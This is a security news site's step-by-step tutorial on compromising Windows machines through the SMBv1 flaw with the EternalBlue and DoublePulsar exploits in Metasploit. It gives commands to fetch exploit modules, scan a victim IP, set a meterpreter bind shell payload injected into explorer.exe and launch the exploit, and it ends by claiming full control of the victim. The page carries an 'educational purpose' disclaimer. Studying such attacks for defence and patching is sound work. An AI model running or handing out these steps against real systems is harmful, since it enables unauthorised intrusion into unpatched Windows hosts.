Sunday, February 9, 2025
HomeExploitation ToolsExploit Windows Remote PC with EternalBlue & DoublePulsar Exploit through Metasploit

Exploit Windows Remote PC with EternalBlue & DoublePulsar Exploit through Metasploit

Published on

SIEM as a Service

Follow Us on Google News

EternalBlue Malware was Developed by National Security Agency (NSA) exploiting Windows-based Server Message Block (SMBv1) it is believed the tool has released by Shadow Brokers Hackers Group in April 2017 and it has been used for Wannacry Cyber Attacks.

SMB version 1 (SMBv1) in various versions of Microsoft Windows accepts specially crafted packets from remote attackers, which is the reason this vulnerability existed with windows os which leads to performing Remote Code Execution which was particularly targeted in Windows 7 and XP.

The NSA Tool Called DOUBLEPULSAR which is designed to provide covert, backdoor access to a Windows system, has been immediately received by Attackers.

Also Read Still More than 50,000 hosts are vulnerable to ETERNAL BLUE Exploit

Once installed, DOUBLEPULSAR  waits for certain types of data to be sent over port 445. When DOUBLEPULSAR  arrives, the implant provides a distinctive response.

EternalBlue Live Demonstration using Metasploit

We need to download and add the Scanner and exploit to Metasploit. Open your Terminal windows and Type the following commands.

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

EternalBlue

Move file smb_ms17_010.rb under the folder use/share/metasploit-framework/modules/auxiliary/scanner/smb

EternalBlue

And then you should copy Eternal Blue-Doublepulsar.rb and debs to under use/share/metasploit-framework/modules/exploits/windows/smb

EternalBlue

Now Open the Eternal Blue-Doublepulsar.rb with any Editor and change the path directory for ETERNALBLUE and DOUBLEPULSAR to smb exploit directory use/share/metasploit-framework/modules/exploits/windows/smb.

Also Read  NSA Malware “EternalBlue” Successfully Exploit and Port into Microsoft Windows 10

Then we should specify the name of the process to be injected, we have specified here as explorer.exe

EternalBlue

Then you should launch msfconsole and use the auxiliary scan module  smb_ms17_010.rb.

> use auxiliary/scanner/smb/smb_ms17_010
> show options

EternalBlue

Now you should set up RHOSTS IP which is the Victims Ip address.

> set RHOSTS IP
> run

EternalBlue

It will go and check whether the host is vulnerable or not and also display the victim’s machine details.

Now we can move to the exploit EternalBlue & Double Pulsar                                             > use exploit/windows/smb/eternalblue_doublepulsar
> set payload windows.x64/meterpreter/bind_tcp

> show options

EternalBlue

Then set a target architecture and then RHOST Victim IP address.

> setRHOST IP
> set targetarchitecture x64
> show options

EternalBlue
EternalBlue

And then type exploit and hit enter.

EternalBlue

It’s done now we have got the meterpreter session and the vulnerability has been exploited.

EternalBlue

Now the system has been exploited successfully and we have full control over the victim machine now.

You can follow us on LinkedinTwitter, and Facebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep yourself self-updated.

Disclaimer

This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and www.gbhackers.com  will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

UK Pressures Apple to Create Global Backdoor To Spy on Encrypted iCloud Access

United Kingdom has reportedly ordered Apple to create a backdoor allowing access to all...

Autonomous LLMs Reshaping Pen Testing: Real-World AD Breaches and the Future of Cybersecurity

Large Language Models (LLMs) are transforming penetration testing (pen testing), leveraging their advanced reasoning...

Securing GAI-Driven Semantic Communications: A Novel Defense Against Backdoor Attacks

Semantic communication systems, powered by Generative AI (GAI), are transforming the way information is...

Cybercriminals Target IIS Servers to Spread BadIIS Malware

A recent wave of cyberattacks has revealed the exploitation of Microsoft Internet Information Services...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

Windows 11 BitLocker Bypassed to Extract Encryption Keys

An attacker with physical access can abruptly restart the device and dump RAM, as...

ConvoC2 – A Red Teamers Tool To Execute Commands on Hacked Hosts Via Microsoft Teams

A stealthy Command-and-Control (C2) infrastructure Red Team tool named ConvoC2 showcases how cyber attackers...

Cloudflare Developer Domains Abused For Cyber Attacks

Cloudflare Pages, a popular web deployment platform, is exploited by threat actors to host...